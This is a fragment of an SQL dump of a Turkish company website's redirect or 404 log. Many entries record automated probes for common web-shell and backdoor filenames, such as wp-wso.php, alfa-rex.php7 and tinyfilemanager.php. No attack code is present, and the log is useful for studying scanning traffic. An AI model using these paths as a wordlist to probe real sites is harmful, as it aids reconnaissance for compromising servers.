00:00:00',301),(54513,'https://3s-technologies.com.tr/tr///templates/beez5/css/print.css',NULL,'','',1,0,'2025-12-26 16:10:05','0000-00-00 00:00:00',301),(54514,'https://3s-technologies.com.tr/tr///media/djextensions/jquery-easing/jquery.easing.min.js',NULL,'','',1,0,'2025-12-26 16:10:08','0000-00-00 00:00:00',301),(54515,'https://3s-technologies.com.tr/tr///media/jui/js/jquery-noconflict.js?59b9a97f81c129b0e3167385c8580231',NULL,'','',1,0,'2025-12-26 16:10:09','0000-00-00 00:00:00',301),(54516,'https://3s-technologies.com.tr/tr///media/system/js/mootools-more.js?59b9a97f81c129b0e3167385c8580231',NULL,'','',1,0,'2025-12-26 16:10:09','0000-00-00 00:00:00',301),(54517,'https://3s-technologies.com.tr/tr///templates/beez5/javascript/md_stylechanger.js',NULL,'','',1,0,'2025-12-26 16:10:09','0000-00-00 00:00:00',301),(54518,'https://3s-technologies.com.tr/tr///modules/mod_djimageslider/assets/js/slider.js?v=4.1.1',NULL,'','',1,0,'2025-12-26 16:10:09','0000-00-00 00:00:00',301),(54519,'https://3s-technologies.com.tr/tr///media/system/js/html5fallback.js?59b9a97f81c129b0e3167385c8580231',NULL,'','',1,0,'2025-12-26 16:10:09','0000-00-00 00:00:00',301),(54520,'https://3s-technologies.com.tr/tr///components/com_virtuemart/assets/js/chosen.jquery.min.js?vmver=1ca80efd',NULL,'','',1,0,'2025-12-26 16:10:09','0000-00-00 00:00:00',301),(54521,'https://3s-technologies.com.tr/tr///modules/mod_virtuemart_cart/assets/js/update_cart.js?vmver=1ca80efd',NULL,'','',1,0,'2025-12-26 16:10:09','0000-00-00 00:00:00',301),(54522,'https://3s-technologies.com.tr/tr///media/system/js/caption.js?59b9a97f81c129b0e3167385c8580231',NULL,'','',1,0,'2025-12-26 16:10:09','0000-00-00 00:00:00',301),(54523,'https://3s-technologies.com.tr/tr///media/system/js/core.js?59b9a97f81c129b0e3167385c8580231',NULL,'','',1,0,'2025-12-26 16:10:09','0000-00-00 00:00:00',301),(54524,'https://3s-technologies.com.tr/tr///media/jui/js/jquery.min.js?59b9a97f81c129b0e3167385c8580231',NULL,'','',1,0,'2025-12-26 16:10:09','0000-00-00 00:00:00',301),(54525,'https://3s-technologies.com.tr/tr///components/com_virtuemart/assets/js/vmsite.js?vmver=1ca80efd',NULL,'','',1,0,'2025-12-26 16:10:09','0000-00-00 00:00:00',301),(54526,'https://3s-technologies.com.tr/tr///media/jui/js/jquery-migrate.min.js?59b9a97f81c129b0e3167385c8580231',NULL,'','',1,0,'2025-12-26 16:10:09','0000-00-00 00:00:00',301),(54527,'https://3s-technologies.com.tr/tr///media/system/js/mootools-core.js?59b9a97f81c129b0e3167385c8580231',NULL,'','',1,0,'2025-12-26 16:10:10','0000-00-00 00:00:00',301),(54528,'https://3s-technologies.com.tr/tr///templates/beez5/javascript/hide.js',NULL,'','',1,0,'2025-12-26 16:10:10','0000-00-00 00:00:00',301),(54529,'https://3s-technologies.com.tr/tr///components/com_virtuemart/assets/js/vmprices.js?vmver=1ca80efd',NULL,'','',1,0,'2025-12-26 16:10:10','0000-00-00 00:00:00',301),(54530,'http://mail.3s-technologies.com.tr/tr/.well-known/classwithtostring.php',NULL,'','',1,0,'2025-12-26 19:16:48','0000-00-00 00:00:00',301),(54531,'http://mail.3s-technologies.com.tr/tr/.well-known/radio.php',NULL,'','',1,0,'2025-12-26 19:16:49','0000-00-00 00:00:00',301),(54532,'http://mail.3s-technologies.com.tr/tr/87.php',NULL,'','',3,0,'2025-12-26 19:16:54','0000-00-00 00:00:00',301),(54533,'http://mail.3s-technologies.com.tr/tr/admin/index.php',NULL,'','',6,0,'2025-12-26 19:17:00','0000-00-00 00:00:00',301),(54534,'http://mail.3s-technologies.com.tr/tr/adminfuns.php',NULL,'','',49,0,'2025-12-26 19:17:01','0000-00-00 00:00:00',301),(54535,'http://mail.3s-technologies.com.tr/tr/xleet',NULL,'','',2,0,'2025-12-26 19:17:03','0000-00-00 00:00:00',301),(54536,'http://mail.3s-technologies.com.tr/tr/al.php',NULL,'','',2,0,'2025-12-26 19:17:04','0000-00-00 00:00:00',301),(54537,'http://mail.3s-technologies.com.tr/tr/assets/images/doc.php',NULL,'','',1,0,'2025-12-26 19:17:10','0000-00-00 00:00:00',301),(54538,'http://mail.3s-technologies.com.tr/tr/autoload_classmap/function.php',NULL,'','',1,0,'2025-12-26 19:17:14','0000-00-00 00:00:00',301),(54539,'http://mail.3s-technologies.com.tr/tr/b.php',NULL,'','',27,0,'2025-12-26 19:17:15','0000-00-00 00:00:00',301),(54540,'http://mail.3s-technologies.com.tr/tr/blog/fw.php',NULL,'','',1,0,'2025-12-26 19:17:16','0000-00-00 00:00:00',301),(54541,'http://mail.3s-technologies.com.tr/tr/bugz.php',NULL,'','',1,0,'2025-12-26 19:17:17','0000-00-00 00:00:00',301),(54542,'http://mail.3s-technologies.com.tr/tr/composer.php',NULL,'','',1,0,'2025-12-26 19:17:23','0000-00-00 00:00:00',301),(54543,'http://mail.3s-technologies.com.tr/tr/files/index.php',NULL,'','',2,0,'2025-12-26 19:17:31','0000-00-00 00:00:00',301),(54544,'http://mail.3s-technologies.com.tr/tr/fix.php',NULL,'','',3,0,'2025-12-26 19:17:32','0000-00-00 00:00:00',301),(54545,'http://mail.3s-technologies.com.tr/tr/images/class-config.php',NULL,'','',1,0,'2025-12-26 19:17:44','0000-00-00 00:00:00',301),(54546,'http://mail.3s-technologies.com.tr/tr/index.bak.php',NULL,'','',1,0,'2025-12-26 19:17:46','0000-00-00 00:00:00',301),(54547,'http://mail.3s-technologies.com.tr/tr/infos.php',NULL,'','',2,0,'2025-12-26 19:17:49','0000-00-00 00:00:00',301),(54548,'http://mail.3s-technologies.com.tr/tr/mini',NULL,'','',1,0,'2025-12-26 19:17:52','0000-00-00 00:00:00',301),(54549,'http://mail.3s-technologies.com.tr/tr/mm.php',NULL,'','',1,0,'2025-12-26 19:17:54','0000-00-00 00:00:00',301),(54550,'http://mail.3s-technologies.com.tr/tr/ms-edit.php',NULL,'','',71,0,'2025-12-26 19:17:55','0000-00-00 00:00:00',301),(54551,'http://mail.3s-technologies.com.tr/tr/ms-themes.php',NULL,'','',1,0,'2025-12-26 19:17:56','0000-00-00 00:00:00',301),(54552,'http://mail.3s-technologies.com.tr/tr/options-reading.php',NULL,'','',3,0,'2025-12-26 19:17:57','0000-00-00 00:00:00',301),(54553,'http://mail.3s-technologies.com.tr/tr/options-writing.php',NULL,'','',1,0,'2025-12-26 19:17:58','0000-00-00 00:00:00',301),(54554,'http://mail.3s-technologies.com.tr/tr/wp-activat.php',NULL,'','',3,0,'2025-12-26 19:18:02','0000-00-00 00:00:00',301),(54555,'http://mail.3s-technologies.com.tr/tr/nf.php',NULL,'','',2,0,'2025-12-26 19:18:05','0000-00-00 00:00:00',301),(54556,'http://mail.3s-technologies.com.tr/tr/php8.php',NULL,'','',4,0,'2025-12-26 19:18:10','0000-00-00 00:00:00',301),(54557,'http://mail.3s-technologies.com.tr/tr/pinfo.php',NULL,'','',4,0,'2025-12-26 19:18:12','0000-00-00 00:00:00',301),(54558,'http://mail.3s-technologies.com.tr/tr/robots.php',NULL,'','',1,0,'2025-12-26 19:18:13','0000-00-00 00:00:00',301),(54559,'http://mail.3s-technologies.com.tr/tr/rt.php',NULL,'','',4,0,'2025-12-26 19:18:18','0000-00-00 00:00:00',301),(54560,'http://mail.3s-technologies.com.tr/tr/setup.php',NULL,'','',5,0,'2025-12-26 19:18:20','0000-00-00 00:00:00',301),(54561,'http://mail.3s-technologies.com.tr/tr/test1.php',NULL,'','',31,0,'2025-12-26 19:18:24','0000-00-00 00:00:00',301),(54562,'http://mail.3s-technologies.com.tr/tr/file/function.php',NULL,'','',2,0,'2025-12-26 19:18:25','0000-00-00 00:00:00',301),(54563,'http://mail.3s-technologies.com.tr/tr/tinyfilemanager.php',NULL,'','',21,0,'2025-12-26 19:18:26','0000-00-00 00:00:00',301),(54564,'http://mail.3s-technologies.com.tr/tr/users.php',NULL,'','',8,0,'2025-12-26 19:18:28','0000-00-00 00:00:00',301),(54565,'http://mail.3s-technologies.com.tr/tr/wp-admin.php',NULL,'','',9,0,'2025-12-26 19:18:31','0000-00-00 00:00:00',301),(54566,'http://mail.3s-technologies.com.tr/tr/wp-admin',NULL,'','',7,0,'2025-12-26 19:18:32','0000-00-00 00:00:00',301),(54567,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/colors/light/wp-login.php',NULL,'','',2,0,'2025-12-26 19:18:33','0000-00-00 00:00:00',301),(54568,'http://mail.3s-technologies.com.tr/tr/wp-admin/images/moon.php',NULL,'','',1,0,'2025-12-26 19:18:34','0000-00-00 00:00:00',301),(54569,'http://mail.3s-technologies.com.tr/tr/wp-admin/includes/colour.php',NULL,'','',1,0,'2025-12-26 19:18:35','0000-00-00 00:00:00',301),(54570,'http://mail.3s-technologies.com.tr/tr/wp-admin/includes/index.php',NULL,'','',16,0,'2025-12-26 19:18:36','0000-00-00 00:00:00',301),(54571,'http://mail.3s-technologies.com.tr/tr/wp-admin/js/autoload_classmap.php',NULL,'','',2,0,'2025-12-26 19:18:37','0000-00-00 00:00:00',301),(54572,'http://mail.3s-technologies.com.tr/tr/wp-admin/wp-admins.php',NULL,'','',1,0,'2025-12-26 19:18:39','0000-00-00 00:00:00',301),(54573,'http://mail.3s-technologies.com.tr/tr/wp-admin/wp-login.php',NULL,'','',1,0,'2025-12-26 19:18:40','0000-00-00 00:00:00',301),(54574,'http://mail.3s-technologies.com.tr/tr/wp-admin/wp.php',NULL,'','',1,0,'2025-12-26 19:18:41','0000-00-00 00:00:00',301),(54575,'http://mail.3s-technologies.com.tr/tr/wp-api.php',NULL,'','',1,0,'2025-12-26 19:18:43','0000-00-00 00:00:00',301),(54576,'http://mail.3s-technologies.com.tr/tr/wp-comments.php',NULL,'','',1,0,'2025-12-26 19:18:44','0000-00-00 00:00:00',301),(54577,'http://mail.3s-technologies.com.tr/tr/wp-content/about.php',NULL,'','',9,0,'2025-12-26 19:18:48','0000-00-00 00:00:00',301),(54578,'http://mail.3s-technologies.com.tr/tr/wp-includes/phpmailer/file.php',NULL,'','',1,0,'2025-12-26 19:18:49','0000-00-00 00:00:00',301),(54579,'http://mail.3s-technologies.com.tr/tr/wp-includes/simplepie/chosen.php',NULL,'','',1,0,'2025-12-26 19:18:50','0000-00-00 00:00:00',301),(54580,'http://mail.3s-technologies.com.tr/tr/wp-includes/about.php',NULL,'','',1,0,'2025-12-26 19:18:51','0000-00-00 00:00:00',301),(54581,'http://mail.3s-technologies.com.tr/tr/wp-logs.php',NULL,'','',1,0,'2025-12-26 19:18:51','0000-00-00 00:00:00',301),(54582,'http://mail.3s-technologies.com.tr/tr/wp-setup.php',NULL,'','',1,0,'2025-12-26 19:18:53','0000-00-00 00:00:00',301),(54583,'http://mail.3s-technologies.com.tr/tr/wp-signin.php',NULL,'','',2,0,'2025-12-26 19:18:54','0000-00-00 00:00:00',301),(54584,'http://mail.3s-technologies.com.tr/tr/wp-wso.php',NULL,'','',3,0,'2025-12-26 19:18:55','0000-00-00 00:00:00',301),(54585,'http://mail.3s-technologies.com.tr/tr/wp_wrong_datlib.php',NULL,'','',3,0,'2025-12-26 19:18:57','0000-00-00 00:00:00',301),(54586,'http://mail.3s-technologies.com.tr/tr/y.php',NULL,'','',6,0,'2025-12-26 19:19:00','0000-00-00 00:00:00',301),(54587,'http://mail.3s-technologies.com.tr/tr/classwithtostring',NULL,'','',1,0,'2025-12-26 19:19:02','0000-00-00 00:00:00',301),(54588,'http://mail.3s-technologies.com.tr/tr/inputs',NULL,'','',1,0,'2025-12-26 19:19:03','0000-00-00 00:00:00',301),(54589,'https://3s-technologies.com.tr/tr/donate/one-off',NULL,'','',2,0,'2025-12-27 05:07:19','0000-00-00 00:00:00',301),(54590,'https://3s-technologies.com.tr/tr/giving',NULL,'','',2,0,'2025-12-27 05:07:19','0000-00-00 00:00:00',301),(54591,'https://3s-technologies.com.tr/tr/support',NULL,'','',2,0,'2025-12-27 05:07:20','0000-00-00 00:00:00',301),(54592,'https://3s-technologies.com.tr/tr/fundraising',NULL,'','',2,0,'2025-12-27 05:07:21','0000-00-00 00:00:00',301),(54593,'https://3s-technologies.com.tr/tr/donation',NULL,'','',5,0,'2025-12-27 05:07:21','0000-00-00 00:00:00',301),(54594,'http://3s-technologies.com.tr/en/222.php',NULL,'https://www.google.co.uk/','',48,0,'2025-12-28 02:46:23','0000-00-00 00:00:00',301),(54595,'http://3s-technologies.com.tr/en/admin/controller/extension/extension/jnweppgp.php',NULL,'https://www.google.co.uk/','',7,0,'2025-12-28 02:46:26','0000-00-00 00:00:00',301),(54596,'http://3s-technologies.com.tr/en/wp-content/content.php',NULL,'https://duckduckgo.com/','',12,0,'2025-12-28 02:46:49','0000-00-00 00:00:00',301),(54597,'http://3s-technologies.com.tr/en/wp-content/plugins/ultimate_vc_addons/assets/alfa-rex.php7',NULL,'https://www.google.co.uk/','',12,0,'2025-12-28 02:46:51','0000-00-00 00:00:00',301),(54598,'http://3s-technologies.com.tr/en/wp-content/plugins/yanierin/akc.php',NULL,'https://www.google.co.uk/','',12,0,'2025-12-28 02:46:55','0000-00-00 00:00:00',301),(54599,'http://3s-technologies.com.tr/en/wp-includes/requests/src/cookie',NULL,'https://www.google.com/','',12,0,'2025-12-28 02:47:06','0000-00-00 00:00:00',301),(54600,'https://3s-technologies.com.tr/tr/ã¼rã¼nler/smd-fä±rä±n/by,product_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2025-12-28 04:51:08','0000-00-00 00:00:00',301),(54601,'http://3s-technologies.com.tr/tr/bless14.php',NULL,'','',10,0,'2025-12-28 05:20:25','0000-00-00 00:00:00',301),(54602,'http://3s-technologies.com.tr/tr/s1.php',NULL,'','',30,0,'2025-12-28 05:20:26','0000-00-00 00:00:00',301),(54603,'http://3s-technologies.com.tr/tr/lanz.php',NULL,'','',8,0,'2025-12-28 05:20:27','0000-00-00 00:00:00',301),(54604,'http://3s-technologies.com.tr/tr/xeeex.php',NULL,'','',7,0,'2025-12-28 05:20:28','0000-00-00 00:00:00',301),(54605,'http://3s-technologies.com.tr/tr/tons.php',NULL,'','',8,0,'2025-12-28 05:20:28','0000-00-00 00:00:00',301),(54606,'http://3s-technologies.com.tr/tr/wpup.php',NULL,'','',8,0,'2025-12-28 05:20:29','0000-00-00 00:00:00',301),(54607,'http://3s-technologies.com.tr/tr/xa.php',NULL,'','',68,0,'2025-12-28 05:20:29','0000-00-00 00:00:00',301),(54608,'http://3s-technologies.com.tr/tr/asf.php',NULL,'','',13,0,'2025-12-28 05:20:30','0000-00-00 00:00:00',301),(54609,'http://3s-technologies.com.tr/tr/bras.php',NULL,'','',9,0,'2025-12-28 05:20:31','0000-00-00 00:00:00',301),(54610,'http://3s-technologies.com.tr/tr/an8.php',NULL,'','',9,0,'2025-12-28 05:20:32','0000-00-00 00:00:00',301),(54611,'http://3s-technologies.com.tr/tr/esp.php',NULL,'','',9,0,'2025-12-28 05:20:32','0000-00-00 00:00:00',301),(54612,'http://3s-technologies.com.tr/tr/out.php',NULL,'','',7,0,'2025-12-28 05:20:33','0000-00-00 00:00:00',301),(54613,'http://3s-technologies.com.tr/tr/flower2.php',NULL,'','',18,0,'2025-12-28 05:20:34','0000-00-00 00:00:00',301),(54614,'http://3s-technologies.com.tr/tr/family.php',NULL,'','',8,0,'2025-12-28 05:20:34','0000-00-00 00:00:00',301),(54615,'http://3s-technologies.com.tr/tr/ws35.php',NULL,'','',13,0,'2025-12-28 05:20:35','0000-00-00 00:00:00',301),(54616,'http://3s-technologies.com.tr/tr/ws13.php',NULL,'','',2,0,'2025-12-28 05:20:36','0000-00-00 00:00:00',301),(54617,'http://3s-technologies.com.tr/tr/ss1.php',NULL,'','',6,0,'2025-12-28 05:20:37','0000-00-00 00:00:00',301),(54618,'http://3s-technologies.com.tr/tr/ww7.php',NULL,'','',2,0,'2025-12-28 05:20:37','0000-00-00 00:00:00',301),(54619,'http://3s-technologies.com.tr/tr/w2025.php',NULL,'','',40,0,'2025-12-28 05:20:38','0000-00-00 00:00:00',301),(54620,'http://3s-technologies.com.tr/tr/lisa.php',NULL,'','',8,0,'2025-12-28 05:20:38','0000-00-00 00:00:00',301),(54621,'http://3s-technologies.com.tr/tr/blurbs15.php',NULL,'','',11,0,'2025-12-28 05:21:03','0000-00-00 00:00:00',301),(54622,'http://3s-technologies.com.tr/tr/cheka.php',NULL,'','',5,0,'2025-12-28 05:21:24','0000-00-00 00:00:00',301),(54623,'http://3s-technologies.com.tr/tr/tebar.php',NULL,'','',1,0,'2025-12-28 13:20:17','0000-00-00 00:00:00',301),(54624,'http://3s-technologies.com.tr/tr/ty226.php',NULL,'','',1,0,'2025-12-28 13:20:18','0000-00-00 00:00:00',301),(54625,'http://3s-technologies.com.tr/tr/songsa.php',NULL,'','',1,0,'2025-12-28 13:20:18','0000-00-00 00:00:00',301),(54626,'http://3s-technologies.com.tr/tr/qing2.php',NULL,'','',1,0,'2025-12-28 13:20:19','0000-00-00 00:00:00',301),(54627,'http://3s-technologies.com.tr/tr/massby2.php',NULL,'','',1,0,'2025-12-28 13:20:19','0000-00-00 00:00:00',301),(54628,'http://3s-technologies.com.tr/tr/qual.php',NULL,'','',1,0,'2025-12-28 13:20:20','0000-00-00 00:00:00',301),(54629,'http://3s-technologies.com.tr/tr/udnkq.php',NULL,'','',1,0,'2025-12-28 13:20:20','0000-00-00 00:00:00',301),(54630,'http://3s-technologies.com.tr/tr/ng.php',NULL,'','',30,0,'2025-12-28 13:20:21','0000-00-00 00:00:00',301),(54631,'http://3s-technologies.com.tr/tr/z4qmm5.php',NULL,'','',1,0,'2025-12-28 13:20:21','0000-00-00 00:00:00',301),(54632,'http://3s-technologies.com.tr/tr/no3.php',NULL,'','',1,0,'2025-12-28 13:20:22','0000-00-00 00:00:00',301),(54633,'http://3s-technologies.com.tr/tr/om.php',NULL,'','',5,0,'2025-12-28 13:20:22','0000-00-00 00:00:00',301),(54634,'http://3s-technologies.com.tr/tr/webix.php',NULL,'','',2,0,'2025-12-28 13:20:23','0000-00-00 00:00:00',301),(54635,'http://3s-technologies.com.tr/tr/cka.php',NULL,'','',1,0,'2025-12-28 13:20:24','0000-00-00 00:00:00',301),(54636,'http://3s-technologies.com.tr/tr/en-us/2021/04/30/php-community-sidesteps-its-third-supply-chain-attack-in-three-years',NULL,'','',1,0,'2025-12-29 12:51:12','0000-00-00 00:00:00',301),(54637,'https://3s-technologies.com.tr/en/feed/atom',NULL,'','',16,0,'2025-12-29 12:51:16','0000-00-00 00:00:00',301),(54638,'http://3s-technologies.com.tr/en/man.php',NULL,'','',25,0,'2025-12-29 12:51:20','0000-00-00 00:00:00',301),(54639,'http://3s-technologies.com.tr/en/modules/mod_footer/tmpl/index.php',NULL,'','',1,0,'2025-12-29 12:51:20','0000-00-00 00:00:00',301),(54640,'http://3s-technologies.com.tr/en/private',NULL,'','',5,0,'2025-12-29 12:51:22','0000-00-00 00:00:00',301),(54641,'http://3s-technologies.com.tr/en/system.php',NULL,'','',26,0,'2025-12-29 12:51:25','0000-00-00 00:00:00',301),(54642,'http://3s-technologies.com.tr/en/theme.php',NULL,'','',1,0,'2025-12-29 12:51:26','0000-00-00 00:00:00',301),(54643,'http://3s-technologies.com.tr/en/wp-admin/includes/moon.php',NULL,'','',1,0,'2025-12-29 12:51:30','0000-00-00 00:00:00',301),(54644,'http://3s-technologies.com.tr/en/wp-conf.php',NULL,'','',1,0,'2025-12-29 12:51:32','0000-00-00 00:00:00',301),(54645,'http://3s-technologies.com.tr/en/wp-content/plugins/ioxi/ioxi',NULL,'','',1,0,'2025-12-29 12:51:34','0000-00-00 00:00:00',301),(54646,'http://3s-technologies.com.tr/en/wp-content/themes/404.php',NULL,'','',1,0,'2025-12-29 12:51:35','0000-00-00 00:00:00',301),(54647,'http://3s-technologies.com.tr/en/wp-content/uploads/wp.php',NULL,'','',1,0,'2025-12-29 12:51:39','0000-00-00 00:00:00',301),(54648,'http://3s-technologies.com.tr/en/wp-include.php',NULL,'','',18,0,'2025-12-29 12:51:40','0000-00-00 00:00:00',301),(54649,'http://3s-technologies.com.tr/en/wp-includes/requests/library/index.php',NULL,'','',7,0,'2025-12-29 12:51:41','0000-00-00 00:00:00',301),(54650,'http://3s-technologies.com.tr/en/wp-includes/blocks/group',NULL,'','',1,0,'2025-12-29 12:51:42','0000-00-00 00:00:00',301),(54651,'http://3s-technologies.com.tr/en/wp-includes/blocks/post-author',NULL,'','',1,0,'2025-12-29 12:51:42','0000-00-00 00:00:00',301),(54652,'http://3s-technologies.com.tr/en/wp-includes/header.php',NULL,'','',3,0,'2025-12-29 12:51:44','0000-00-00 00:00:00',301),(54653,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/skins/lightgray',NULL,'','',1,0,'2025-12-29 12:51:44','0000-00-00 00:00:00',301),(54654,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/themes/inlite',NULL,'','',1,0,'2025-12-29 12:51:45','0000-00-00 00:00:00',301),(54655,'http://3s-technologies.com.tr/en/wp-includes/mani.php',NULL,'','',1,0,'2025-12-29 12:51:46','0000-00-00 00:00:00',301),(54656,'http://3s-technologies.com.tr/en/wp-includes/rest-api/fields/index.php',NULL,'https://duckduckgo.com/','',21,0,'2025-12-29 16:35:37','0000-00-00 00:00:00',301),(54657,'http://3s-technologies.com.tr/en/images/xmrlpc.php',NULL,'https://duckduckgo.com/','',7,0,'2025-12-29 18:34:57','0000-00-00 00:00:00',301),(54658,'http://3s-technologies.com.tr/en/admin-header.php',NULL,'https://www.google.fr/','',24,0,'2025-12-30 16:28:50','0000-00-00 00:00:00',301),(54659,'http://3s-technologies.com.tr/en/tiny.php',NULL,'https://www.google.com/','',18,0,'2025-12-30 16:29:33','0000-00-00 00:00:00',301),(54660,'http://3s-technologies.com.tr/en/vx.php',NULL,'https://www.google.co.uk/','',25,0,'2025-12-30 16:29:34','0000-00-00 00:00:00',301),(54661,'http://3s-technologies.com.tr/en/wp-links.php',NULL,'https://www.bing.com/','',18,0,'2025-12-30 16:29:39','0000-00-00 00:00:00',301),(54662,'http://mail.3s-technologies.com.tr/tr/mda.php',NULL,'','',1,0,'2025-12-30 17:21:45','0000-00-00 00:00:00',301),(54663,'http://mail.3s-technologies.com.tr/tr/cheka.php',NULL,'','',1,0,'2025-12-30 17:21:46','0000-00-00 00:00:00',301),(54664,'http://mail.3s-technologies.com.tr/tr/zsz.php',NULL,'','',1,0,'2025-12-30 17:21:48','0000-00-00 00:00:00',301),(54665,'http://mail.3s-technologies.com.tr/tr/bby.php',NULL,'','',1,0,'2025-12-30 17:21:52','0000-00-00 00:00:00',301),(54666,'http://mail.3s-technologies.com.tr/tr/xtride.php',NULL,'','',2,0,'2025-12-30 17:21:53','0000-00-00 00:00:00',301),(54667,'http://mail.3s-technologies.com.tr/tr/ws29.php',NULL,'','',4,0,'2025-12-30 17:21:54','0000-00-00 00:00:00',301),(54668,'http://mail.3s-technologies.com.tr/tr/oo.php',NULL,'','',11,0,'2025-12-30 17:21:55','0000-00-00 00:00:00',301),(54669,'http://mail.3s-technologies.com.tr/tr/s11.php',NULL,'','',2,0,'2025-12-30 17:21:56','0000-00-00 00:00:00',301),(54670,'http://mail.3s-technologies.com.tr/tr/dir.php',NULL,'','',1,0,'2025-12-30 17:21:56','0000-00-00 00:00:00',301),(54671,'http://mail.3s-technologies.com.tr/tr/aqw.php',NULL,'','',2,0,'2025-12-30 17:21:57','0000-00-00 00:00:00',301),(54672,'http://mail.3s-technologies.com.tr/tr/ca1.php',NULL,'','',1,0,'2025-12-30 17:21:58','0000-00-00 00:00:00',301),(54673,'http://mail.3s-technologies.com.tr/tr/abouta.php',NULL,'','',2,0,'2025-12-30 17:22:00','0000-00-00 00:00:00',301),(54674,'http://mail.3s-technologies.com.tr/tr/fclas.php',NULL,'','',1,0,'2025-12-30 17:22:01','0000-00-00 00:00:00',301),(54675,'http://mail.3s-technologies.com.tr/tr/all.php',NULL,'','',2,0,'2025-12-30 17:22:03','0000-00-00 00:00:00',301),(54676,'http://mail.3s-technologies.com.tr/tr/bbn.php',NULL,'','',2,0,'2025-12-30 17:22:04','0000-00-00 00:00:00',301),(54677,'http://mail.3s-technologies.com.tr/tr/xz89.php',NULL,'','',2,0,'2025-12-30 17:22:06','0000-00-00 00:00:00',301),(54678,'http://mail.3s-technologies.com.tr/tr/wft.php',NULL,'','',1,0,'2025-12-30 17:22:10','0000-00-00 00:00:00',301),(54679,'http://mail.3s-technologies.com.tr/tr/ws28.php',NULL,'','',4,0,'2025-12-30 17:22:11','0000-00-00 00:00:00',301),(54680,'http://mail.3s-technologies.com.tr/tr/wsvvs.php',NULL,'','',14,0,'2025-12-30 17:22:13','0000-00-00 00:00:00',301),(54681,'http://mail.3s-technologies.com.tr/tr/vbbn.php',NULL,'','',2,0,'2025-12-30 17:22:14','0000-00-00 00:00:00',301),(54682,'http://mail.3s-technologies.com.tr/tr/fz.php',NULL,'','',4,0,'2025-12-30 17:22:16','0000-00-00 00:00:00',301),(54683,'http://mail.3s-technologies.com.tr/tr/sang.php',NULL,'','',2,0,'2025-12-30 17:22:17','0000-00-00 00:00:00',301),(54684,'http://mail.3s-technologies.com.tr/tr/0o0.php',NULL,'','',4,0,'2025-12-30 17:22:17','0000-00-00 00:00:00',301),(54685,'http://mail.3s-technologies.com.tr/tr/zxl.php',NULL,'','',2,0,'2025-12-30 17:22:18','0000-00-00 00:00:00',301),(54686,'http://mail.3s-technologies.com.tr/tr/blurbs15.php',NULL,'','',3,0,'2025-12-30 17:23:44','0000-00-00 00:00:00',301),(54687,'http://mail.3s-technologies.com.tr/tr/.well-known/acme-challenge/wp-login.php',NULL,'','',1,0,'2025-12-30 17:23:58','0000-00-00 00:00:00',301),(54688,'http://mail.3s-technologies.com.tr/tr/xse25.php',NULL,'','',2,0,'2025-12-30 17:24:02','0000-00-00 00:00:00',301),(54689,'http://mail.3s-technologies.com.tr/tr/wp-includes/index.php',NULL,'','',7,0,'2025-12-30 17:24:04','0000-00-00 00:00:00',301),(54690,'http://mail.3s-technologies.com.tr/tr/shoyo.php',NULL,'','',4,0,'2025-12-30 17:24:06','0000-00-00 00:00:00',301),(54691,'http://mail.3s-technologies.com.tr/tr/waq.php',NULL,'','',2,0,'2025-12-30 17:24:07','0000-00-00 00:00:00',301),(54692,'http://mail.3s-technologies.com.tr/tr/wakak.php',NULL,'','',2,0,'2025-12-30 17:24:08','0000-00-00 00:00:00',301),(54693,'http://mail.3s-technologies.com.tr/tr/wp-includes/wp-class.php',NULL,'','',3,0,'2025-12-30 17:24:11','0000-00-00 00:00:00',301),(54694,'http://mail.3s-technologies.com.tr/tr/wp-includes/widgets/index.php',NULL,'','',2,0,'2025-12-30 17:24:12','0000-00-00 00:00:00',301),(54695,'http://mail.3s-technologies.com.tr/tr/wen.php',NULL,'','',46,0,'2025-12-30 17:24:13','0000-00-00 00:00:00',301),(54696,'http://mail.3s-technologies.com.tr/tr/cwclass.php',NULL,'','',13,0,'2025-12-30 17:24:14','0000-00-00 00:00:00',301),(54697,'http://mail.3s-technologies.com.tr/tr/ah24.php',NULL,'','',2,0,'2025-12-30 17:24:14','0000-00-00 00:00:00',301),(54698,'http://mail.3s-technologies.com.tr/tr/rtx.php',NULL,'','',14,0,'2025-12-30 17:24:15','0000-00-00 00:00:00',301),(54699,'http://mail.3s-technologies.com.tr/tr/bipas.php',NULL,'','',4,0,'2025-12-30 17:24:16','0000-00-00 00:00:00',301),(54700,'http://mail.3s-technologies.com.tr/tr/conte.php',NULL,'','',2,0,'2025-12-30 17:24:17','0000-00-00 00:00:00',301),(54701,'http://mail.3s-technologies.com.tr/tr/class3.php',NULL,'','',1,0,'2025-12-30 17:24:17','0000-00-00 00:00:00',301),(54702,'http://3s-technologies.com.tr/en/vendor/composer',NULL,'https://www.yahoo.com/','',2,0,'2025-12-30 18:15:14','0000-00-00 00:00:00',301),(54703,'http://3s-technologies.com.tr/tr/mda.php',NULL,'','',3,0,'2025-12-30 19:45:51','0000-00-00 00:00:00',301),(54704,'http://3s-technologies.com.tr/tr/bby.php',NULL,'','',3,0,'2025-12-30 19:45:56','0000-00-00 00:00:00',301),(54705,'http://3s-technologies.com.tr/en/wp-content/themes/twentyfifteen',NULL,'https://www.google.co.uk/','',20,0,'2025-12-31 00:12:21','0000-00-00 00:00:00',301),(54706,'http://3s-technologies.com.tr/en/wp-includes/js/thickbox',NULL,'https://www.google.co.uk/','',21,0,'2025-12-31 00:12:36','0000-00-00 00:00:00',301),(54707,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/compat3x',NULL,'https://www.google.de/','',2,0,'2025-12-31 00:12:38','0000-00-00 00:00:00',301),(54708,'http://mail.3s-technologies.com.tr/tr/zwq.php',NULL,'','',1,0,'2025-12-31 00:39:04','0000-00-00 00:00:00',301),(54709,'http://mail.3s-technologies.com.tr/tr/ana.php',NULL,'','',1,0,'2025-12-31 00:39:07','0000-00-00 00:00:00',301),(54710,'http://mail.3s-technologies.com.tr/tr/she.php',NULL,'','',2,0,'2025-12-31 00:39:09','0000-00-00 00:00:00',301),(54711,'http://mail.3s-technologies.com.tr/tr/excel.php',NULL,'','',1,0,'2025-12-31 00:39:11','0000-00-00 00:00:00',301),(54712,'http://mail.3s-technologies.com.tr/tr/ap.php',NULL,'','',3,0,'2025-12-31 00:39:12','0000-00-00 00:00:00',301),(54713,'http://mail.3s-technologies.com.tr/tr/love.php',NULL,'','',1,0,'2025-12-31 00:39:14','0000-00-00 